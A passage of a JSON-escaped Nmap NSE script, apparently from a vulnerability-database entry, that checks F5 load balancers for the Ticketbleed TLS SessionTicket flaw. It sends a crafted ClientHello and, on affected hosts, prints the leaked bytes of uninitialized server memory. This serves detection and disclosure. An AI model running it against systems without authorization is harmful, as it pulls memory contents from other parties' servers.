Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n [\"SessionTicket TLS\"] = ticket,\n },\n })\n\n -- Connect the socket so that it is ready to start a TLS session.\n if starttls then\n local status\n status, socket = starttls(host, port)\n if not status then\n stdnse.debug3(\"StartTLS connection to server failed: %s\", socket)\n return\n end\n else\n socket = nmap.new_socket()\n local status, err = socket:connect(host, port, \"tcp\")\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", err)\n return\n end\n end\n\n -- Send Client Hello to the target server.\n local status, err = socket:send(hello)\n if not status then\n stdnse.debug1(\"Couldn't send Client Hello: %s\", err)\n socket:close()\n return\n end\n\n -- Read responses from server.\n local status, response, err = tls.record_buffer(socket)\n socket:close()\n if err == \"TIMEOUT\" then\n stdnse.debug1(\"Timeout exceeded waiting for Server Hello Done.\")\n return\n end\n if not status then\n stdnse.debug1(\"Couldn't receive: %s\", err)\n socket:close()\n return\n end\n\n -- Attempt to parse the response.\n local _, record = tls.record_read(response)\n if record == nil then\n stdnse.debug1(\"Unrecognized response from server.\")\n return\n end\n if record.protocol ~= version then\n stdnse.debug1(\"Server responded with a different protocol than we requested: %s\", record.protocol)\n return\n end\n if record.type ~= \"handshake\" then\n stdnse.debug1(\"Server failed to respond with a handshake record: %s\", record.type)\n return\n end\n\n -- Search for the ServerHello record, which contains the Session ID\n -- we want.\n local sid_new\n for _, body in ipairs(record.body) do\n if body.type == \"server_hello\" then\n sid_new = body.session_id\n end\n end\n\n if not sid_new then\n stdnse.debug1(\"Failed to receive a Server Hello record.\")\n return\n end\n\n if sid_new == \"\" then\n stdnse.debug1(\"Server did not respond with a session ID.\")\n return\n end\n\n -- Check whether the Session ID matches what we originally sent,\n -- which should be the case for a properly-functioning TLS stacks.\n if sid_new == sid_old then\n stdnse.debug1(\"Server properly echoed our short, random session ID.\")\n return\n end\n\n -- If the system is unaffected, it should provide a new session ID\n -- unrelated to the one we provided. Check for the new session ID\n -- being prefixed by the one we sent, indicating an affected system.\n if sid_new:sub(1, #sid_old) ~= sid_old then\n stdnse.debug1(\"Server responded with a new, unrelated session ID.\")\n stdnse.debug1(\"Original session ID: %s\", stdnse.tohex(sid_old, {separator = \":\"}))\n stdnse.debug1(\"Received session ID: %s\", stdnse.tohex(sid_new, {separator = \":\"}))\n return\n end\n\n return sid_new\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"Ticketbleed is a serious issue in products manufactured by F5, a popular vendor of TLS load-balancers. The issue allows for stealing information from the load balancer\",\n state = vulns.STATE.NOT_VULN,\n risk_factor = \"High\",\n description = [[\nTicketbleed is vulnerability in the implementation of the TLS SessionTicket extension found in some F5 products. It allows the leakage (\"bleeding\") of up to 31 bytes of data from uninitialized memory. This is caused by the TLS stack padding a Session ID, passed from the client, with data to make it 32-bits long.\n ]],\n\n references = {\n \"https://filippo.io/Ticketbleed/\",\n \"https://blog.filippo.io/finding-ticketbleed/\",\n \"https://support.f5.com/csp/article/K05121675\"\n }\n }\n\n -- Accept user-specified protocols.\n local vers = stdnse.get_script_args(SCRIPT_NAME .. \".protocols\") or {\"TLSv1.0\", \"TLSv1.1\", \"TLSv1.2\"}\n if type(vers) == \"string\" then\n vers = {vers}\n end\n\n for _, ver in ipairs(vers) do\n -- Ensure the protocol version is supported.\n if nil == tls.PROTOCOLS[ver] then\n return \"\\n Unsupported protocol version: \" .. ver\n end\n\n -- Check for the presence of the vulnerability.\n local sid = is_vuln(host, port, ver)\n if sid then\n vuln_table.state = vulns.STATE.EXPLOIT\n vuln_table.exploit_results = {\n stdnse.tohex(sid:sub(17)),\n (sid:sub(17):gsub(\"[^%g ]\", \".\"))\n }\n break\n end\n end\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
